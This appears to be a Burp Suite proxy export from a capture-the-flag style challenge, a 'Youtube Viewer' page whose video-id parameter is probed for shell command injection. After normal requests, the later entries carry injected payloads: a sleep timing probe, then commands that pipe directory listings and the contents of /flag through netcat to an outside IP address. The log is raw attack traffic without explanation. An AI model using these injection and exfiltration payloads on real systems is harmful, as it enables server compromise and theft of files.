<?xml version="1.1"?>
<!-- NOTE: Any NULL bytes in requests and responses are preserved within this output, even though this strictly breaks the XML syntax. If your XML parser rejects the NULL bytes then you will need to remove or replace these bytes before parsing. Alternatively, you can use the option to base64-encode requests and responses. -->
<!DOCTYPE items [
<!ELEMENT items (item*)>
<!ATTLIST items burpVersion CDATA "">
<!ATTLIST items exportTime CDATA "">
<!ELEMENT item (time, url, host, port, protocol, method, path, extension, request, status, responselength, mimetype, response, comment)>
<!ELEMENT time (#PCDATA)>
<!ELEMENT url (#PCDATA)>
<!ELEMENT host (#PCDATA)>
<!ATTLIST host ip CDATA "">
<!ELEMENT port (#PCDATA)>
<!ELEMENT protocol (#PCDATA)>
<!ELEMENT method (#PCDATA)>
<!ELEMENT path (#PCDATA)>
<!ELEMENT extension (#PCDATA)>
<!ELEMENT request (#PCDATA)>
<!ATTLIST request base64 (true|false) "false">
<!ELEMENT status (#PCDATA)>
<!ELEMENT responselength (#PCDATA)>
<!ELEMENT mimetype (#PCDATA)>
<!ELEMENT response (#PCDATA)>
<!ATTLIST response base64 (true|false) "false">
<!ELEMENT comment (#PCDATA)>
]>
<items burpVersion="1.7.35" exportTime="Mon Dec 17 18:15:27 CST 2018">
  <item>
    <time>Mon Dec 17 17:58:53 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:4007/]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>4007</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET / HTTP/1.1
Host: 140.110.112.32:4007
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>200</status>
    <responselength>913</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Mon, 17 Dec 2018 09:58:53 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 720
Connection: close
Content-Type: text/html; charset=UTF-8

<head>
<link href="https://fonts.googleapis.com/css?family=IM+Fell+French+Canon+SC" rel="stylesheet">
</head>
<body style="background-color: #fefad0;font-family: 'IM Fell French Canon SC', serif;font-size:20px">

<h1>Youtube Viewer</h1>

Give me a valid youtube id:
<form method="get">
<input type="text" name="v">
<input type="submit">
</form><br><br>
Example: uCLEq9V0-Yk
<br>
I will check your input is valid youtube id or not.
<br><br>
<iframe id="ytplayer" type="text/html" width="640" height="360"
  src="https://www.youtube.com/embed/uCLEq9V0-Yk?autoplay=0"
  frameborder="0"></iframe>
<!-- hint: backend will download/view the youtube video image and check it exist or not. -->
<!-- Try more payload -->
</body>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Mon Dec 17 17:59:14 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:4007/?v=uCLEq9V0-Yk]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>4007</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/?v=uCLEq9V0-Yk]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET /?v=uCLEq9V0-Yk HTTP/1.1
Host: 140.110.112.32:4007
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:4007/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>200</status>
    <responselength>913</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Mon, 17 Dec 2018 09:59:14 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 720
Connection: close
Content-Type: text/html; charset=UTF-8

<head>
<link href="https://fonts.googleapis.com/css?family=IM+Fell+French+Canon+SC" rel="stylesheet">
</head>
<body style="background-color: #fefad0;font-family: 'IM Fell French Canon SC', serif;font-size:20px">

<h1>Youtube Viewer</h1>

Give me a valid youtube id:
<form method="get">
<input type="text" name="v">
<input type="submit">
</form><br><br>
Example: uCLEq9V0-Yk
<br>
I will check your input is valid youtube id or not.
<br><br>
<iframe id="ytplayer" type="text/html" width="640" height="360"
  src="https://www.youtube.com/embed/uCLEq9V0-Yk?autoplay=0"
  frameborder="0"></iframe>
<!-- hint: backend will download/view the youtube video image and check it exist or not. -->
<!-- Try more payload -->
</body>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Mon Dec 17 17:59:31 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:4007/?v=]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>4007</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/?v=]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET /?v= HTTP/1.1
Host: 140.110.112.32:4007
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>200</status>
    <responselength>958</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Mon, 17 Dec 2018 09:59:31 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 765
Connection: close
Content-Type: text/html; charset=UTF-8

<head>
<link href="https://fonts.googleapis.com/css?family=IM+Fell+French+Canon+SC" rel="stylesheet">
</head>
<body style="background-color: #fefad0;font-family: 'IM Fell French Canon SC', serif;font-size:20px">

<h1>Youtube Viewer</h1>

Give me a valid youtube id:
<form method="get">
<input type="text" name="v">
<input type="submit">
</form><br><br>
Example: uCLEq9V0-Yk
<br>
I will check your input is valid youtube id or not.
<br><br>
<h3>Q___Q  Your input seems invalid.</h3><br><iframe id="ytplayer" type="text/html" width="640" height="360"
  src="https://www.youtube.com/embed/uCLEq9V0-Yk?autoplay=0"
  frameborder="0"></iframe>
<!-- hint: backend will download/view the youtube video image and check it exist or not. -->
<!-- Try more payload -->
</body>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Mon Dec 17 18:00:21 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:4007/?v=%20]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>4007</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/?v=%20]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET /?v=%20 HTTP/1.1
Host: 140.110.112.32:4007
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>200</status>
    <responselength>903</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Mon, 17 Dec 2018 10:00:21 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 710
Connection: close
Content-Type: text/html; charset=UTF-8

<head>
<link href="https://fonts.googleapis.com/css?family=IM+Fell+French+Canon+SC" rel="stylesheet">
</head>
<body style="background-color: #fefad0;font-family: 'IM Fell French Canon SC', serif;font-size:20px">

<h1>Youtube Viewer</h1>

Give me a valid youtube id:
<form method="get">
<input type="text" name="v">
<input type="submit">
</form><br><br>
Example: uCLEq9V0-Yk
<br>
I will check your input is valid youtube id or not.
<br><br>
<iframe id="ytplayer" type="text/html" width="640" height="360"
  src="https://www.youtube.com/embed/ ?autoplay=0"
  frameborder="0"></iframe>
<!-- hint: backend will download/view the youtube video image and check it exist or not. -->
<!-- Try more payload -->
</body>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Mon Dec 17 18:03:45 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:4007/?v=%27;sleep+10%3B%23%27]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>4007</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/?v=%27;sleep+10%3B%23%27]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET /?v=%27;sleep+10%3B%23%27 HTTP/1.1
Host: 140.110.112.32:4007
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>200</status>
    <responselength>958</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Mon, 17 Dec 2018 10:03:46 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 765
Connection: close
Content-Type: text/html; charset=UTF-8

<head>
<link href="https://fonts.googleapis.com/css?family=IM+Fell+French+Canon+SC" rel="stylesheet">
</head>
<body style="background-color: #fefad0;font-family: 'IM Fell French Canon SC', serif;font-size:20px">

<h1>Youtube Viewer</h1>

Give me a valid youtube id:
<form method="get">
<input type="text" name="v">
<input type="submit">
</form><br><br>
Example: uCLEq9V0-Yk
<br>
I will check your input is valid youtube id or not.
<br><br>
<h3>Q___Q  Your input seems invalid.</h3><br><iframe id="ytplayer" type="text/html" width="640" height="360"
  src="https://www.youtube.com/embed/uCLEq9V0-Yk?autoplay=0"
  frameborder="0"></iframe>
<!-- hint: backend will download/view the youtube video image and check it exist or not. -->
<!-- Try more payload -->
</body>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Mon Dec 17 18:11:19 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:4007/?v=%27;ls%20-al%20|%20nc%2035.221.197.238%2080%3B%23']]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>4007</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/?v=%27;ls%20-al%20|%20nc%2035.221.197.238%2080%3B%23']]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET /?v=%27;ls%20-al%20|%20nc%2035.221.197.238%2080%3B%23' HTTP/1.1
Host: 140.110.112.32:4007
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:4007/?v=%20
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>200</status>
    <responselength>958</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Mon, 17 Dec 2018 10:11:19 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 765
Connection: close
Content-Type: text/html; charset=UTF-8

<head>
<link href="https://fonts.googleapis.com/css?family=IM+Fell+French+Canon+SC" rel="stylesheet">
</head>
<body style="background-color: #fefad0;font-family: 'IM Fell French Canon SC', serif;font-size:20px">

<h1>Youtube Viewer</h1>

Give me a valid youtube id:
<form method="get">
<input type="text" name="v">
<input type="submit">
</form><br><br>
Example: uCLEq9V0-Yk
<br>
I will check your input is valid youtube id or not.
<br><br>
<h3>Q___Q  Your input seems invalid.</h3><br><iframe id="ytplayer" type="text/html" width="640" height="360"
  src="https://www.youtube.com/embed/uCLEq9V0-Yk?autoplay=0"
  frameborder="0"></iframe>
<!-- hint: backend will download/view the youtube video image and check it exist or not. -->
<!-- Try more payload -->
</body>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Mon Dec 17 18:11:40 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:4007/?v=%27;ls%20-al%20/%20|%20nc%2035.221.197.238%2080%3B%23']]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>4007</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/?v=%27;ls%20-al%20/%20|%20nc%2035.221.197.238%2080%3B%23']]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET /?v=%27;ls%20-al%20/%20|%20nc%2035.221.197.238%2080%3B%23' HTTP/1.1
Host: 140.110.112.32:4007
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:4007/?v=%20
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>200</status>
    <responselength>958</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Mon, 17 Dec 2018 10:11:40 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 765
Connection: close
Content-Type: text/html; charset=UTF-8

<head>
<link href="https://fonts.googleapis.com/css?family=IM+Fell+French+Canon+SC" rel="stylesheet">
</head>
<body style="background-color: #fefad0;font-family: 'IM Fell French Canon SC', serif;font-size:20px">

<h1>Youtube Viewer</h1>

Give me a valid youtube id:
<form method="get">
<input type="text" name="v">
<input type="submit">
</form><br><br>
Example: uCLEq9V0-Yk
<br>
I will check your input is valid youtube id or not.
<br><br>
<h3>Q___Q  Your input seems invalid.</h3><br><iframe id="ytplayer" type="text/html" width="640" height="360"
  src="https://www.youtube.com/embed/uCLEq9V0-Yk?autoplay=0"
  frameborder="0"></iframe>
<!-- hint: backend will download/view the youtube video image and check it exist or not. -->
<!-- Try more payload -->
</body>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Mon Dec 17 18:12:13 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:4007/?v=%27;cat%20/flag%20|%20nc%2035.221.197.238%2080%3B%23']]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>4007</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/?v=%27;cat%20/flag%20|%20nc%2035.221.197.238%2080%3B%23']]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET /?v=%27;cat%20/flag%20|%20nc%2035.221.197.238%2080%3B%23' HTTP/1.1
Host: 140.110.112.32:4007
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:4007/?v=%20
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>200</status>
    <responselength>958</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Mon, 17 Dec 2018 10:12:13 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 765
Connection: close
Content-Type: text/html; charset=UTF-8

<head>
<link href="https://fonts.googleapis.com/css?family=IM+Fell+French+Canon+SC" rel="stylesheet">
</head>
<body style="background-color: #fefad0;font-family: 'IM Fell French Canon SC', serif;font-size:20px">

<h1>Youtube Viewer</h1>

Give me a valid youtube id:
<form method="get">
<input type="text" name="v">
<input type="submit">
</form><br><br>
Example: uCLEq9V0-Yk
<br>
I will check your input is valid youtube id or not.
<br><br>
<h3>Q___Q  Your input seems invalid.</h3><br><iframe id="ytplayer" type="text/html" width="640" height="360"
  src="https://www.youtube.com/embed/uCLEq9V0-Yk?autoplay=0"
  frameborder="0"></iframe>
<!-- hint: backend will download/view the youtube video image and check it exist or not. -->
<!-- Try more payload -->
</body>
]]></response>
    <comment></comment>
  </item>
</items>
